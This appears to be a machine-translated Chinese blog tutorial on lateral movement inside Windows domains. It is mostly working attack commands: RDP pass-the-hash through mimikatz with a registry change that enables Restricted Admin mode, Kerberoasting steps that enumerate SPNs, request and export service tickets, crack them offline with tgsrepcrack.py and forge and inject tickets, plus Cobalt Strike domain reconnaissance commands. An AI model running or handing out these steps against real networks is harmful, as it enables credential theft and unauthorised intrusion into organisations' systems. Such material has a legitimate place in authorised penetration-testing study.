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Intranet Security Learning (V) -- domain horizontal: SPN & RDP & Cobalt strike

2022-07-06 00:19:00 Twilight

Domain horizontal CobaltStrike&SPN&RDP

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1. The domain moves horizontally —RDP Pass on -Mimikatz

Except as mentioned before IPC、WMI、SMB、NTLM In addition to the connection of other protocols , Get the plaintext password or HASH Ciphertext can also be passed through RDP agreement (3389 port ) Connect operation .

1)RDP Plaintext password connection :

Windows: mstsc
mstsc.exe /console /v192.168.3.21 /admin

linux: rdesktop

2)RDP Ciphertext hash Connect :

windows Server Need to open Restricted Admin mode, stay Windows 8.1 and Windows Server 2012 R2 On by default , At the same time, if Win 7 and Windows Server 2008 R2 Installed 2871997、2973351 Patches also support ; Open command :

REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v 
DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

Start and run :

mstsc.exe /restrictedadmin
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 “/run:mstsc.exe /restrictedadmin”

2. The domain moves horizontally —SPN service – probe , request , Crack , rewrite

First of all, through this article to understand what is SPN:https://www.cnblogs.com/backlion/p/8082623.html

We mainly use SPN Scanning service , Its scanning will not trigger firewall detection 、 probe 、 Simple command and other advantages , See mind map for the process .
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Hackers can use valid domain user authentication tickets (TGT) To request service tickets for one or more target services running on the server .DC Find... In the active directory SPN, And use the SPN The associated service account encrypts the ticket , So that the service can verify whether users can access . Requested Kerberos service ticket The encryption type of is RC4_HMAC_MD5, This means that the service account NTLM The password hash is used to encrypt the service ticket . Hackers will receive TGS The bill is cracked offline , You can get the target service account HASH, This is called Kerberoast attack . If we have an arbitrary account registered for a domain user account SPN, Then the clear text password of the user account NTLM The hash value will be used to create the service ticket . This is it. Kerberoasting The key to the attack .

# probe ( System comes with setspn command ):
setspn -q */*
setspn -q */* | finder "MSSQL"

There is no domain environment on my computer , Nothing can be swept :
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When there is a domain, view the service information of the domain , probe :
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select mssql service :
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To collect information :
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#  request : powershell function !  It's fine too mimikatz Tools 
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"  // Remember to replace with the previously filtered service 

mimikatz.exe "kerberos::ask /target:xxxx"

View session delete the original session :
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Two lines of command /mimikatz Request service :
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You can see that the service ticket is requested :
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#  export : mimikatz Tools 
mimikatz.exe "kerberos::list /export"

Export the ticket information and take it to crack :

be used kerberoast.py Tools :

# Blast :
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-[email protected]~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

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Get the code Admin12345 :
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Check it out :
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# rewrite :
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512

mimikatz.exe kerberos::ptt xxxx.kirbi #  Inject the generated ticket into memory 

After the bill is injected, it is equivalent to being directly connected , No validation , forge admin user . But the probability of success is small , It belongs to the subsequent penetration tool .

3. The domain moves horizontally — Process a Soha —CobaltStrike Tools First experience

About the process :

start-up - To configure - monitor - perform - go online - Raise the right - information gathering ( The Internet , voucher , Positioning, etc )- penetration
1. Explanation on startup and configuration
2. About rights lifting and plug-in loading
3. Explanation of information collection command
4. Explanation of view automation function

net view
net computer
net dclist 
shell net user /domain

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Refer to :《Cobalt Strike 4.0 manual 》

